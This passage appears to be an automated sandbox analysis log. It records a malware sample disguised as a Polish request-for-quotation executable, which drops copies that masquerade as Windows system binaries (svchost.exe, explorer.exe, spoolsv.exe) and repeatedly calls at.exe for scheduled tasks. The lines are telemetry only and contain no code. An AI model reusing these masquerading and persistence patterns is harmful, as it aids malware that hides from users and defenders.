                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: msdart.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System\explorer.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: drprov.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: ntlanman.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: davclnt.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: davhlpr.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System\svchost.exeSection loaded: browcli.dllJump to behavior
                    Source: C:\Windows\System\spoolsv.exeSection loaded: msvbvm60.dll
                    Source: C:\Windows\System\spoolsv.exeSection loaded: vb6zz.dll
                    Source: C:\Windows\System\spoolsv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System\spoolsv.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System\spoolsv.exeSection loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\System\explorer.exeSection loaded: msvbvm60.dll
                    Source: C:\Windows\System\explorer.exeSection loaded: vb6zz.dll
                    Source: C:\Windows\System\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System\explorer.exeSection loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
